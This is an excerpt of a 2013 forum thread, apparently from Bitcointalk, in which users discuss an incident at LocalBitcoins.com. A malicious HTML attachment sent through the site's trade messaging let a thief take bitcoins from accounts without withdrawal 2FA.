looks like the exploit just sucked out peoples BTC, through a loophole even if they had 2FA.


Title: Re: LocalBitcoins.com exploit!
Post by: niko on September 14, 2013, 06:46:59 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?


Title: Re: LocalBitcoins.com exploit!
Post by: willphase on September 14, 2013, 10:21:22 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

You had to open the attachment (that was in fact an HTML page) and not have 2FA on withdrawals enabled.

Will


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 14, 2013, 10:22:58 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

did you mean because i linked to the forum in the OP? no, that link was safe, or what do you think of me  >:(

the exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.


Title: Re: LocalBitcoins.com exploit!
Post by: niko on September 15, 2013, 01:58:31 AM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

did you mean because i linked to the forum in the OP? no, that link was safe, or what do you think of me  >:(

the exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.
Ten days ago I was browsing through LBC Site, and there was great advice on how to trade safely. I specifically remember them reminding people to always be cautious with any attachments in emails, etc.
People clicked on attachments, did not have 2FA, and sure enough the thief got their coins.